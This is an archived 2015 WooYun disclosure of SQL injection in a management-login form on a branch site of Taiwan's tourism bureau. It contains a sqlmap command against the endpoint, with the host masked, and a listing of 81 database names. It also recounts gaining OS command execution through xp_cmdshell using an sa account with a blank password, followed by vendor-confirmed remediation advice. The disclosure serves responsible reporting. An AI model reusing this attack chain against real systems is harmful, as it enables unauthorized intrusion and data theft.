当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161995

漏洞标题:台湾交通部观光局某分站SQL注射漏洞(臺灣地區)

相关厂商:Hitcon台湾互联网漏洞报告平台

漏洞作者: TouchEvil

提交时间:2015-12-17 11:36

修复时间:2016-02-01 19:48

公开时间:2016-02-01 19:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-17: 细节已通知厂商并且等待厂商处理中
2015-12-18: 厂商已经确认,细节仅向厂商公开
2015-12-28: 细节向核心白帽子及相关领域专家公开
2016-01-07: 细节向普通白帽子公开
2016-01-17: 细节向实习白帽子公开
2016-02-01: 细节向公众公开

简要描述:

侧漏大量数据库

详细说明:

台湾交通部觀光局行動導覽管理系統 http://**.**.**.**

1.jpg


登录框“账号”存在SQL注射漏洞
用万能密码直接可进入后台,如下图

2.jpg


5.jpg


使用sqlmap跑一下注入点

sqlmap -u "http://**.**.**.**/MobileService_tourism/manager/login_submit.asp" --data "login_id=123&passwd=132" -p login_id


6.jpg


7.jpg


available databases [81]:                                                                                                                            
[*] ALMANAC
[*] aspnetdb
[*] bike_talk
[*] bike_traval
[*] bk
[*] EastCoastNsa
[*] Ec_Bike2Taiwan
[*] ECNSA-GreenPack
[*] EcnsaAdmin
[*] EcnsaTour
[*] GUA
[*] Happiness
[*] happystay
[*] HotSpring
[*] MAOLIN01
[*] MAOLIN02
[*] master
[*] MobileService_Tourism
[*] model
[*] msdb
[*] NEYC02
[*] NGN01
[*] NGN_B
[*] PENGHU01
[*] Penghu2014
[*] PengHu_Blog
[*] Penghu_wcm
[*] PenghuAct01
[*] PenghuStars
[*] pkstar
[*] ReportServer
[*] ReportServerTempDB
[*] SML02
[*] SML_Event01
[*] Southwest_OATB
[*] SouthwestCoast_new
[*] SouthwestCoastPic
[*] SunMoonLake_wcm
[*] sw_volunteer
[*] SWApply_old
[*] SWCOAST01
[*] swcoast_act2
[*] swcoast_new
[*] Swcoast_VE
[*] SwcoastDisability
[*] tbroc05
[*] TBROC09
[*] TBROC15
[*] TBROC16
[*] TBROC17_Old
[*] TBROC18
[*] TBROC19
[*] tbroc21_ephoto
[*] TBROC23
[*] TBROC26
[*] TBROC31
[*] TBROC32
[*] TBROC33
[*] TBROC36_JobServiceDB
[*] TBROC36_TAMS2_LOG
[*] TBROC36_TAMS2_RPT
[*] TBROC36_TAMS2_SEC
[*] TBROC37
[*] TBROC38
[*] TBROC39
[*] TBROC40
[*] TBROC41
[*] TBROC42
[*] TBROC43_JobServiceDB
[*] TBROC43_TAMS2_LOG
[*] TBROC43_TAMS2_RPT
[*] TBROC43_TAMS2_SEC
[*] TBROC46
[*] tempdb
[*] thsf
[*] tour101_db
[*] trimt2010
[*] Trimt_areadb
[*] Trimt_WCM
[*] TrimtAct
[*] XingHao


直接使用sqlmap的--os-shell参数,调用系统命令,发现加载xp_cmdshell失败

9.jpg


查看数据库账号和密码,发现sa账号为空密码

8.jpg


切换到sa账号,加载xp_cmdshell成功

10.jpg


11.jpg


查看乌云中之前有位基友发现过该观光局另外一分站漏洞(http://**.**.**.**/bugs/wooyun-2010-0143537)
该基友当时测试的地址是: **.**.**.** 当时该分站注射出的数据库有78个。
经对比应该为同一个数据库,但是两个分站的IP如下:
**.**.**.**:**.**.**.**
**.**.**.**:**.**.**.**
猜测应该是同一台数据库服务器,当时只是修复了gis分站的sql注射,但是sa账号密码为空如果不修复的话仍然会存在风险。

漏洞证明:

available databases [81]:                                                                                                                            
[*] ALMANAC
[*] aspnetdb
[*] bike_talk
[*] bike_traval
[*] bk
[*] EastCoastNsa
[*] Ec_Bike2Taiwan
[*] ECNSA-GreenPack
[*] EcnsaAdmin
[*] EcnsaTour
[*] GUA
[*] Happiness
[*] happystay
[*] HotSpring
[*] MAOLIN01
[*] MAOLIN02
[*] master
[*] MobileService_Tourism
[*] model
[*] msdb
[*] NEYC02
[*] NGN01
[*] NGN_B
[*] PENGHU01
[*] Penghu2014
[*] PengHu_Blog
[*] Penghu_wcm
[*] PenghuAct01
[*] PenghuStars
[*] pkstar
[*] ReportServer
[*] ReportServerTempDB
[*] SML02
[*] SML_Event01
[*] Southwest_OATB
[*] SouthwestCoast_new
[*] SouthwestCoastPic
[*] SunMoonLake_wcm
[*] sw_volunteer
[*] SWApply_old
[*] SWCOAST01
[*] swcoast_act2
[*] swcoast_new
[*] Swcoast_VE
[*] SwcoastDisability
[*] tbroc05
[*] TBROC09
[*] TBROC15
[*] TBROC16
[*] TBROC17_Old
[*] TBROC18
[*] TBROC19
[*] tbroc21_ephoto
[*] TBROC23
[*] TBROC26
[*] TBROC31
[*] TBROC32
[*] TBROC33
[*] TBROC36_JobServiceDB
[*] TBROC36_TAMS2_LOG
[*] TBROC36_TAMS2_RPT
[*] TBROC36_TAMS2_SEC
[*] TBROC37
[*] TBROC38
[*] TBROC39
[*] TBROC40
[*] TBROC41
[*] TBROC42
[*] TBROC43_JobServiceDB
[*] TBROC43_TAMS2_LOG
[*] TBROC43_TAMS2_RPT
[*] TBROC43_TAMS2_SEC
[*] TBROC46
[*] tempdb
[*] thsf
[*] tour101_db
[*] trimt2010
[*] Trimt_areadb
[*] Trimt_WCM
[*] TrimtAct
[*] XingHao

修复方案:

1、对所有输入参数进行过滤;
2、sa密码不为空。

版权声明:转载请注明来源 TouchEvil@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-12-18 21:54

厂商回复:

感謝通報

最新状态:

暂无


漏洞评价:

评价